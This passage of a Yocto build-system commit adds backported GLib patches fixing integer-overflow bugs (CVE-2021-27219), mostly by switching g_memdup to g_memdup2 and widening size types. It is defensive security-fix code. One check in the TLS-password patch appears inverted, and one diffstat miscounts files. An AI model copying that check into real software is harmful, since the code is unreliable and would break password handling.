+as GHSL-2021-045 by GHSL team member Kevin Backhouse.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Fixes: GHSL-2021-045
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ glib/gbytes.c | 6 ++++--
+ glib/gdir.c | 3 ++-
+ glib/ghash.c | 7 ++++---
+ glib/giochannel.c | 5 +++--
+ glib/gslice.c | 3 ++-
+ glib/gtestutils.c | 3 ++-
+ glib/gvariant.c | 7 ++++---
+ glib/gvarianttype.c | 3 ++-
+ glib/tests/array-test.c | 4 +++-
+ glib/tests/option-context.c | 6 ++++--
+ glib/tests/uri.c | 8 +++++---
+ 11 files changed, 35 insertions(+), 20 deletions(-)
+
+--- a/glib/gbytes.c
++++ b/glib/gbytes.c
+@@ -34,6 +34,8 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
++
+ /**
+ * GBytes:
+ *
+@@ -95,7 +97,7 @@ g_bytes_new (gconstpointer data,
+ {
+ g_return_val_if_fail (data != NULL || size == 0, NULL);
+
+- return g_bytes_new_take (g_memdup (data, size), size);
++ return g_bytes_new_take (g_memdup2 (data, size), size);
+ }
+
+ /**
+@@ -499,7 +501,7 @@ g_bytes_unref_to_data (GBytes *bytes,
+ * Copy: Non g_malloc (or compatible) allocator, or static memory,
+ * so we have to copy, and then unref.
+ */
+- result = g_memdup (bytes->data, bytes->size);
++ result = g_memdup2 (bytes->data, bytes->size);
+ *size = bytes->size;
+ g_bytes_unref (bytes);
+ }
+--- a/glib/gdir.c
++++ b/glib/gdir.c
+@@ -37,6 +37,7 @@
+ #include "gconvert.h"
+ #include "gfileutils.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -112,7 +113,7 @@ g_dir_open_with_errno (const gchar *path
+ return NULL;
+ #endif
+
+- return g_memdup (&dir, sizeof dir);
++ return g_memdup2 (&dir, sizeof dir);
+ }
+
+ /**
+--- a/glib/ghash.c
++++ b/glib/ghash.c
+@@ -34,6 +34,7 @@
+ #include "gmacros.h"
+ #include "glib-private.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gatomic.h"
+ #include "gtestutils.h"
+ #include "gslice.h"
+@@ -962,7 +963,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ if (hash_table->have_big_keys)
+ {
+ if (key != value)
+- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+ /* Keys and values are both big now, so no need for further checks */
+ return;
+ }
+@@ -970,7 +971,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+ {
+ if (key != value)
+ {
+- hash_table->values = g_memdup (hash_table->keys, sizeof (guint) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (guint) * hash_table->size);
+ is_a_set = FALSE;
+ }
+ }
+@@ -998,7 +999,7 @@ g_hash_table_ensure_keyval_fits (GHashTa
+
+ /* Just split if necessary */
+ if (is_a_set && key != value)
+- hash_table->values = g_memdup (hash_table->keys, sizeof (gpointer) * hash_table->size);
++ hash_table->values = g_memdup2 (hash_table->keys, sizeof (gpointer) * hash_table->size);
+
+ #endif
+ }
+--- a/glib/giochannel.c
++++ b/glib/giochannel.c
+@@ -35,7 +35,7 @@
+ #include <errno.h>
+
+ #include "giochannel.h"
+-
++#include "gstrfuncsprivate.h"
+ #include "gstrfuncs.h"
+ #include "gtestutils.h"
+ #include "glibintl.h"
+
+@@ -1673,10 +1674,10 @@ g_io_channel_read_line (GIOChannel *cha
+
+ /* Copy the read bytes (including any embedded nuls) and nul-terminate.
+ * `USE_BUF (channel)->str` is guaranteed to be nul-terminated as it’s a
+- * #GString, so it’s safe to call g_memdup() with +1 length to allocate
++ * #GString, so it’s safe to call g_memdup2() with +1 length to allocate
+ * a nul-terminator. */
+ g_assert (USE_BUF (channel));
+- line = g_memdup (USE_BUF (channel)->str, got_length + 1);
++ line = g_memdup2 (USE_BUF (channel)->str, got_length + 1);
+ line[got_length] = '\0';
+ *str_return = g_steal_pointer (&line);
+ g_string_erase (USE_BUF (channel), 0, got_length);
+--- a/glib/gslice.c
++++ b/glib/gslice.c
+@@ -41,6 +41,7 @@
+ #include "gmain.h"
+ #include "gmem.h" /* gslice.h */
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gutils.h"
+ #include "gtrashstack.h"
+ #include "gtestutils.h"
+@@ -350,7 +351,7 @@ g_slice_get_config_state (GSliceConfig c
+ array[i++] = allocator->contention_counters[address];
+ array[i++] = allocator_get_magazine_threshold (allocator, address);
+ *n_values = i;
+- return g_memdup (array, sizeof (array[0]) * *n_values);
++ return g_memdup2 (array, sizeof (array[0]) * *n_values);
+ default:
+ return NULL;
+ }
+--- a/glib/gtestutils.c
++++ b/glib/gtestutils.c
+@@ -49,6 +49,7 @@
+ #include "gpattern.h"
+ #include "grand.h"
+ #include "gstrfuncs.h"
++#include "gstrfuncsprivate.h"
+ #include "gtimer.h"
+ #include "gslice.h"
+ #include "gspawn.h"
+@@ -3803,7 +3804,7 @@ g_test_log_extract (GTestLogBuffer *tbuf
+ if (p <= tbuffer->data->str + mlength)
+ {
+ g_string_erase (tbuffer->data, 0, mlength);
+- tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup (&msg, sizeof (msg)));
++ tbuffer->msgs = g_slist_prepend (tbuffer->msgs, g_memdup2 (&msg, sizeof (msg)));
+ return TRUE;
+ }
+
+--- a/glib/gvariant.c
++++ b/glib/gvariant.c
+@@ -33,6 +33,7 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
+
+ /**
+ * SECTION:gvariant
+@@ -725,7 +726,7 @@ g_variant_new_variant (GVariant *value)
+ g_variant_ref_sink (value);
+
+ return g_variant_new_from_children (G_VARIANT_TYPE_VARIANT,
+- g_memdup (&value, sizeof value),
++ g_memdup2 (&value, sizeof value),
+ 1, g_variant_is_trusted (value));
+ }
+
+@@ -1229,7 +1230,7 @@ g_variant_new_fixed_array (const GVarian
+ return NULL;
+ }
+
+- data = g_memdup (elements, n_elements * element_size);
++ data = g_memdup2 (elements, n_elements * element_size);
+ value = g_variant_new_from_data (array_type, data,
+ n_elements * element_size,
+ FALSE, g_free, data);
+@@ -1908,7 +1909,7 @@ g_variant_dup_bytestring (GVariant *valu
+ if (length)
+ *length = size;
+
+- return g_memdup (original, size + 1);
++ return g_memdup2 (original, size + 1);
+ }
+
+ /**
+--- a/glib/gvarianttype.c
++++ b/glib/gvarianttype.c
+@@ -28,6 +28,7 @@
+
+ #include <string.h>
+
++#include "gstrfuncsprivate.h"
+
+ /**
+ * SECTION:gvarianttype
+@@ -1181,7 +1182,7 @@ g_variant_type_new_tuple (const GVariant
+ g_assert (offset < sizeof buffer);
+ buffer[offset++] = ')';
+
+- return (GVariantType *) g_memdup (buffer, offset);
++ return (GVariantType *) g_memdup2 (buffer, offset);
+ }
+
+ /**
+--- a/glib/tests/array-test.c
++++ b/glib/tests/array-test.c
+@@ -29,6 +29,8 @@
+ #include <string.h>
+ #include "glib.h"
+
++#include "gstrfuncsprivate.h"
++
+ /* Test data to be passed to any function which calls g_array_new(), providing
+ * the parameters for that call. Most #GArray tests should be repeated for all
+ * possible values of #ArrayTestData. */
+@@ -1917,7 +1919,7 @@ byte_array_new_take (void)
+ GByteArray *gbarray;
+ guint8 *data;
+
+- data = g_memdup ("woooweeewow", 11);
++ data = g_memdup2 ("woooweeewow", 11);
+ gbarray = g_byte_array_new_take (data, 11);
+ g_assert (gbarray->data == data);
+ g_assert_cmpuint (gbarray->len, ==, 11);
+--- a/glib/tests/option-context.c
++++ b/glib/tests/option-context.c
+@@ -27,6 +27,8 @@
+ #include <string.h>
+ #include <locale.h>
+
++#include "gstrfuncsprivate.h"
++
+ static GOptionEntry main_entries[] = {
+ { "main-switch", 0, 0,
+ G_OPTION_ARG_NONE, NULL,
+@@ -256,7 +258,7 @@ join_stringv (int argc, char **argv)
+ static char **
+ copy_stringv (char **argv, int argc)
+ {
+- return g_memdup (argv, sizeof (char *) * (argc + 1));
++ return g_memdup2 (argv, sizeof (char *) * (argc + 1));
+ }
+
+ static void
+@@ -2323,7 +2325,7 @@ test_group_parse (void)
+ g_option_context_add_group (context, group);
+
+ argv = split_string ("program --test arg1 -f arg2 --group-test arg3 --frob arg4 -z arg5", &argc);
+- orig_argv = g_memdup (argv, (argc + 1) * sizeof (char *));
++ orig_argv = g_memdup2 (argv, (argc + 1) * sizeof (char *));
+
+ retval = g_option_context_parse (context, &argc, &argv, &error);
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
new file mode 100644
index 0000000000..4f86522d00
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-05.patch
@@ -0,0 +1,54 @@
+From 0cbad673215ec8a049b7fe2ff44b0beed31b376e Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 16:12:24 +0000
+Subject: [PATCH 05/11] gwinhttpfile: Avoid arithmetic overflow when
+ calculating a size
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The members of `URL_COMPONENTS` (`winhttp_file->url`) are `DWORD`s, i.e.
+32-bit unsigned integers. Adding to and multiplying them may cause them
+to overflow the unsigned integer bounds, even if the result is passed to
+`g_memdup2()` which accepts a `gsize`.
+
+Cast the `URL_COMPONENTS` members to `gsize` first to ensure that the
+arithmetic is done in terms of `gsize`s rather than unsigned integers.
+
+Spotted by Sebastian Dröge.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/win32/gwinhttpfile.c | 8 ++++----
+ 1 file changed, 4 insertions(+), 4 deletions(-)
+
+diff --git a/gio/win32/gwinhttpfile.c b/gio/win32/gwinhttpfile.c
+index 3f8fbd838..e0340e247 100644
+--- a/gio/win32/gwinhttpfile.c
++++ b/gio/win32/gwinhttpfile.c
+@@ -410,10 +410,10 @@ g_winhttp_file_resolve_relative_path (GFile *file,
+ child = g_object_new (G_TYPE_WINHTTP_FILE, NULL);
+ child->vfs = winhttp_file->vfs;
+ child->url = winhttp_file->url;
+- child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, (winhttp_file->url.dwSchemeLength+1)*2);
+- child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, (winhttp_file->url.dwHostNameLength+1)*2);
+- child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, (winhttp_file->url.dwUserNameLength+1)*2);
+- child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, (winhttp_file->url.dwPasswordLength+1)*2);
++ child->url.lpszScheme = g_memdup2 (winhttp_file->url.lpszScheme, ((gsize) winhttp_file->url.dwSchemeLength + 1) * 2);
++ child->url.lpszHostName = g_memdup2 (winhttp_file->url.lpszHostName, ((gsize) winhttp_file->url.dwHostNameLength + 1) * 2);
++ child->url.lpszUserName = g_memdup2 (winhttp_file->url.lpszUserName, ((gsize) winhttp_file->url.dwUserNameLength + 1) * 2);
++ child->url.lpszPassword = g_memdup2 (winhttp_file->url.lpszPassword, ((gsize) winhttp_file->url.dwPasswordLength + 1) * 2);
+ child->url.lpszUrlPath = wnew_path;
+ child->url.dwUrlPathLength = wcslen (wnew_path);
+ child->url.lpszExtraInfo = NULL;
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
new file mode 100644
index 0000000000..d8043f5e29
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-06.patch
@@ -0,0 +1,101 @@
+From f9ee2275cbc312c0b4cdbc338a4fbb76eb36fb9a Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:49:00 +0000
+Subject: [PATCH 06/11] gdatainputstream: Handle stop_chars_len internally as
+ gsize
+
+Previously it was handled as a `gssize`, which meant that if the
+`stop_chars` string was longer than `G_MAXSSIZE` there would be an
+overflow.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gdatainputstream.c | 25 +++++++++++++++++--------
+ 1 file changed, 17 insertions(+), 8 deletions(-)
+
+diff --git a/gio/gdatainputstream.c b/gio/gdatainputstream.c
+index 2e7750cb5..2cdcbda19 100644
+--- a/gio/gdatainputstream.c
++++ b/gio/gdatainputstream.c
+@@ -27,6 +27,7 @@
+ #include "gioenumtypes.h"
+ #include "gioerror.h"
+ #include "glibintl.h"
++#include "gstrfuncsprivate.h"
+
+ #include <string.h>
+
+@@ -856,7 +857,7 @@ static gssize
+ scan_for_chars (GDataInputStream *stream,
+ gsize *checked_out,
+ const char *stop_chars,
+- gssize stop_chars_len)
++ gsize stop_chars_len)
+ {
+ GBufferedInputStream *bstream;
+ const char *buffer;
+@@ -952,7 +953,7 @@ typedef struct
+ gsize checked;
+
+ gchar *stop_chars;
+- gssize stop_chars_len;
++ gsize stop_chars_len;
+ gsize length;
+ } GDataInputStreamReadData;
+
+@@ -1078,12 +1079,17 @@ g_data_input_stream_read_async (GDataInputStream *stream,
+ {
+ GDataInputStreamReadData *data;
+ GTask *task;
++ gsize stop_chars_len_unsigned;
+
+ data = g_slice_new0 (GDataInputStreamReadData);
+- if (stop_chars_len == -1)
+- stop_chars_len = strlen (stop_chars);
+- data->stop_chars = g_memdup (stop_chars, stop_chars_len);
+- data->stop_chars_len = stop_chars_len;
++
++ if (stop_chars_len < 0)
++ stop_chars_len_unsigned = strlen (stop_chars);
++ else
++ stop_chars_len_unsigned = (gsize) stop_chars_len;
++
++ data->stop_chars = g_memdup2 (stop_chars, stop_chars_len_unsigned);
++ data->stop_chars_len = stop_chars_len_unsigned;
+ data->last_saw_cr = FALSE;
+
+ task = g_task_new (stream, cancellable, callback, user_data);
+@@ -1338,17 +1344,20 @@ g_data_input_stream_read_upto (GDataInputStream *stream,
+ gssize found_pos;
+ gssize res;
+ char *data_until;
++ gsize stop_chars_len_unsigned;
+
+ g_return_val_if_fail (G_IS_DATA_INPUT_STREAM (stream), NULL);
+
+ if (stop_chars_len < 0)
+- stop_chars_len = strlen (stop_chars);
++ stop_chars_len_unsigned = strlen (stop_chars);
++ else
++ stop_chars_len_unsigned = (gsize) stop_chars_len;
+
+ bstream = G_BUFFERED_INPUT_STREAM (stream);
+
+ checked = 0;
+
+- while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len)) == -1)
++ while ((found_pos = scan_for_chars (stream, &checked, stop_chars, stop_chars_len_unsigned)) == -1)
+ {
+ if (g_buffered_input_stream_get_available (bstream) ==
+ g_buffered_input_stream_get_buffer_size (bstream))
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
new file mode 100644
index 0000000000..f183939c45
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-07.patch
@@ -0,0 +1,76 @@
+From 2aaf593a9eb96d84fe3be740aca2810a97d95592 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:50:37 +0000
+Subject: [PATCH 07/11] gwin32: Use gsize internally in g_wcsdup()
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+This allows it to handle strings up to length `G_MAXSIZE` — previously
+it would overflow with such strings.
+
+Update the several copies of it identically.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gwin32registrykey.c | 34 ++++++++++++++++++++++++++--------
+ 2 files changed, 38 insertions(+), 16 deletions(-)
+
+diff --git a/gio/gwin32registrykey.c b/gio/gwin32registrykey.c
+index 548a94188..2eb67daf8 100644
+--- a/gio/gwin32registrykey.c
++++ b/gio/gwin32registrykey.c
+@@ -127,16 +127,34 @@ typedef enum
+ G_WIN32_REGISTRY_UPDATED_PATH = 1,
+ } GWin32RegistryKeyUpdateFlag;
+
++static gsize
++g_utf16_len (const gunichar2 *str)
++{
++ gsize result;
++
++ for (result = 0; str[0] != 0; str++, result++)
++ ;
++
++ return result;
++}
++
+ static gunichar2 *
+-g_wcsdup (const gunichar2 *str,
+- gssize str_size)
++g_wcsdup (const gunichar2 *str, gssize str_len)
+ {
+- if (str_size == -1)
+- {
+- str_size = wcslen (str) + 1;
+- str_size *= sizeof (gunichar2);
+- }
+- return g_memdup (str, str_size);
++ gsize str_len_unsigned;
++ gsize str_size;
++
++ g_return_val_if_fail (str != NULL, NULL);
++
++ if (str_len < 0)
++ str_len_unsigned = g_utf16_len (str);
++ else
++ str_len_unsigned = (gsize) str_len;
++
++ g_assert (str_len_unsigned <= G_MAXSIZE / sizeof (gunichar2) - 1);
++ str_size = (str_len_unsigned + 1) * sizeof (gunichar2);
++
++ return g_memdup2 (str, str_size);
+ }
+
+ /**
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
new file mode 100644
index 0000000000..ffafc35c07
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-08.patch
@@ -0,0 +1,101 @@
+From ba8ca443051f93a74c0d03d62e70402036f967a5 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 13:58:32 +0000
+Subject: [PATCH 08/11] gkeyfilesettingsbackend: Handle long keys when
+ converting paths
+
+Previously, the code in `convert_path()` could not handle keys longer
+than `G_MAXINT`, and would overflow if that was exceeded.
+
+Convert the code to use `gsize` and `g_memdup2()` throughout, and
+change from identifying the position of the final slash in the string
+using a signed offset `i`, to using a pointer to the character (and
+`strrchr()`). This allows the slash to be at any position in a
+`G_MAXSIZE`-long string, without sacrificing a bit of the offset for
+indicating whether a slash was found.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gkeyfilesettingsbackend.c | 21 ++++++++++-----------
+ 1 file changed, 10 insertions(+), 11 deletions(-)
+
+diff --git a/gio/gkeyfilesettingsbackend.c b/gio/gkeyfilesettingsbackend.c
+index cd5765afd..25b057672 100644
+--- a/gio/gkeyfilesettingsbackend.c
++++ b/gio/gkeyfilesettingsbackend.c
+@@ -33,6 +33,7 @@
+ #include "gfilemonitor.h"
+ #include "gsimplepermission.h"
+ #include "gsettingsbackendinternal.h"
++#include "gstrfuncsprivate.h"
+ #include "giomodule-priv.h"
+ #include "gportalsupport.h"
+
+@@ -145,8 +146,8 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ gchar **group,
+ gchar **basename)
+ {
+- gint key_len = strlen (key);
+- gint i;
++ gsize key_len = strlen (key);
++ const gchar *last_slash;
+
+ if (key_len < kfsb->prefix_len ||
+ memcmp (key, kfsb->prefix, kfsb->prefix_len) != 0)
+@@ -155,38 +156,36 @@ convert_path (GKeyfileSettingsBackend *kfsb,
+ key_len -= kfsb->prefix_len;
+ key += kfsb->prefix_len;
+
+- for (i = key_len; i >= 0; i--)
+- if (key[i] == '/')
+- break;
++ last_slash = strrchr (key, '/');
+
+ if (kfsb->root_group)
+ {
+ /* if a root_group was specified, make sure the user hasn't given
+ * a path that ghosts that group name
+ */
+- if (i == kfsb->root_group_len && memcmp (key, kfsb->root_group, i) == 0)
++ if (last_slash != NULL && (last_slash - key) == kfsb->root_group_len && memcmp (key, kfsb->root_group, last_slash - key) == 0)
+ return FALSE;
+ }
+ else
+ {
+ /* if no root_group was given, ensure that the user gave a path */
+- if (i == -1)
++ if (last_slash == NULL)
+ return FALSE;
+ }
+
+ if (group)
+ {
+- if (i >= 0)
++ if (last_slash != NULL)
+ {
+- *group = g_memdup (key, i + 1);
+- (*group)[i] = '\0';
++ *group = g_memdup2 (key, (last_slash - key) + 1);
++ (*group)[(last_slash - key)] = '\0';
+ }
+ else
+ *group = g_strdup (kfsb->root_group);
+ }
+
+ if (basename)
+- *basename = g_memdup (key + i + 1, key_len - i);
++ *basename = g_memdup2 (last_slash + 1, key_len - (last_slash - key));
+
+ return TRUE;
+ }
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
new file mode 100644
index 0000000000..8efb7c720f
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-09.patch
@@ -0,0 +1,100 @@
+From 65ec7f4d6e8832c481f6e00e2eb007b9a60024ce Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:00:53 +0000
+Subject: [PATCH 09/11] =?UTF-8?q?gsocket:=20Use=20gsize=20to=20track=20nat?=
+ =?UTF-8?q?ive=20sockaddr=E2=80=99s=20size?=
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+Don’t use an `int`, that’s potentially too small. In practical terms,
+this is not a problem, since no socket address is going to be that big.
+
+By making these changes we can use `g_memdup2()` without warnings,
+though. Fewer warnings is good.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gsocket.c | 16 ++++++++++------
+ 1 file changed, 10 insertions(+), 6 deletions(-)
+
+--- a/gio/gsocket.c
++++ b/gio/gsocket.c
+@@ -75,6 +75,7 @@
+ #include "gcredentialsprivate.h"
+ #include "glibintl.h"
+ #include "gioprivate.h"
++#include "gstrfuncsprivate.h"
+
+ #ifdef G_OS_WIN32
+ /* For Windows XP runtime compatibility, but use the system's if_nametoindex() if available */
+@@ -174,7 +175,7 @@ static gboolean g_socket_datagram_ba
+ GError **error);
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len);
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len);
+
+ static gssize
+ g_socket_receive_message_with_timeout (GSocket *socket,
+@@ -260,7 +261,7 @@ struct _GSocketPrivate
+ struct {
+ GSocketAddress *addr;
+ struct sockaddr *native;
+- gint native_len;
++ gsize native_len;
+ guint64 last_used;
+ } recv_addr_cache[RECV_ADDR_CACHE_SIZE];
+ };
+@@ -5259,14 +5260,14 @@ g_socket_send_messages_with_timeout (GSo
+ }
+
+ static GSocketAddress *
+-cache_recv_address (GSocket *socket, struct sockaddr *native, int native_len)
++cache_recv_address (GSocket *socket, struct sockaddr *native, size_t native_len)
+ {
+ GSocketAddress *saddr;
+ gint i;
+ guint64 oldest_time = G_MAXUINT64;
+ gint oldest_index = 0;
+
+- if (native_len <= 0)
++ if (native_len == 0)
+ return NULL;
+
+ saddr = NULL;
+@@ -5274,7 +5275,7 @@ cache_recv_address (GSocket *socket, str
+ {
+ GSocketAddress *tmp = socket->priv->recv_addr_cache[i].addr;
+ gpointer tmp_native = socket->priv->recv_addr_cache[i].native;
+- gint tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
++ gsize tmp_native_len = socket->priv->recv_addr_cache[i].native_len;
+
+ if (!tmp)
+ continue;
+@@ -5304,7 +5305,7 @@ cache_recv_address (GSocket *socket, str
+ g_free (socket->priv->recv_addr_cache[oldest_index].native);
+ }
+
+- socket->priv->recv_addr_cache[oldest_index].native = g_memdup (native, native_len);
++ socket->priv->recv_addr_cache[oldest_index].native = g_memdup2 (native, native_len);
+ socket->priv->recv_addr_cache[oldest_index].native_len = native_len;
+ socket->priv->recv_addr_cache[oldest_index].addr = g_object_ref (saddr);
+ socket->priv->recv_addr_cache[oldest_index].last_used = g_get_monotonic_time ();
+@@ -5452,6 +5453,9 @@ g_socket_receive_message_with_timeout (G
+ /* do it */
+ while (1)
+ {
++ /* addrlen has to be of type int because that’s how WSARecvFrom() is defined */
++ G_STATIC_ASSERT (sizeof addr <= G_MAXINT);
++
+ addrlen = sizeof addr;
+ if (address)
+ result = WSARecvFrom (socket->priv->fd,
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
new file mode 100644
index 0000000000..63fda0b600
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-10.patch
@@ -0,0 +1,59 @@
+From 777b95a88f006d39d9fe6d3321db17e7b0d4b9a4 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:07:39 +0000
+Subject: [PATCH 10/11] gtlspassword: Forbid very long TLS passwords
+MIME-Version: 1.0
+Content-Type: text/plain; charset=UTF-8
+Content-Transfer-Encoding: 8bit
+
+The public API `g_tls_password_set_value_full()` (and the vfunc it
+invokes) can only accept a `gssize` length. Ensure that nul-terminated
+strings passed to `g_tls_password_set_value()` can’t exceed that length.
+Use `g_memdup2()` to avoid an overflow if they’re longer than
+`G_MAXUINT` similarly.
+
+Signed-off-by: Philip Withnall <pwithnall@endlessos.org>
+Helps: #2319
+
+Upstream-Status: Backport [https://mirrors.ocf.berkeley.edu/ubuntu/pool/main/g/glib2.0/glib2.0_2.64.6-1~ubuntu20.04.3.debian.tar.xz]
+CVE: CVE-2021-27219
+Signed-off-by: Neetika Singh <Neetika.Singh@kpit.com>
+Signed-off-by: Ranjitsinh Rathod <ranjitsinh.rathod@kpit.com>
+
+---
+ gio/gtlspassword.c | 10 ++++++++--
+ 1 file changed, 8 insertions(+), 2 deletions(-)
+
+diff --git a/gio/gtlspassword.c b/gio/gtlspassword.c
+index 1e437a7b6..dbcec41a8 100644
+--- a/gio/gtlspassword.c
++++ b/gio/gtlspassword.c
+@@ -23,6 +23,7 @@
+ #include "glibintl.h"
+
+ #include "gioenumtypes.h"
++#include "gstrfuncsprivate.h"
+ #include "gtlspassword.h"
+
+ #include <string.h>
+@@ -287,9 +288,14 @@ g_tls_password_set_value (GTlsPassword *password,
+ g_return_if_fail (G_IS_TLS_PASSWORD (password));
+
+ if (length < 0)
+- length = strlen ((gchar *)value);
++ {
++ /* FIXME: g_tls_password_set_value_full() doesn’t support unsigned gsize */
++ gsize length_unsigned = strlen ((gchar *) value);
++ g_return_if_fail (length_unsigned > G_MAXSSIZE);
++ length = (gssize) length_unsigned;
++ }
+
+- g_tls_password_set_value_full (password, g_memdup (value, length), length, g_free);
++ g_tls_password_set_value_full (password, g_memdup2 (value, (gsize) length), length, g_free);
+ }
+
+ /**
+--
+GitLab
+
+
diff --git a/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
new file mode 100644
index 0000000000..a620a49269
--- /dev/null
+++ b/meta/recipes-core/glib-2.0/glib-2.0/CVE-2021-27219-11.patch
@@ -0,0 +1,63 @@
+From ecdf91400e9a538695a0895b95ad7e8abcdf1749 Mon Sep 17 00:00:00 2001
+From: Philip Withnall <pwithnall@endlessos.org>
+Date: Thu, 4 Feb 2021 14:09:40 +0000
+Subject: [PATCH 11/11] giochannel: Forbid very long line terminator strings
+MIME-Version: 1.0
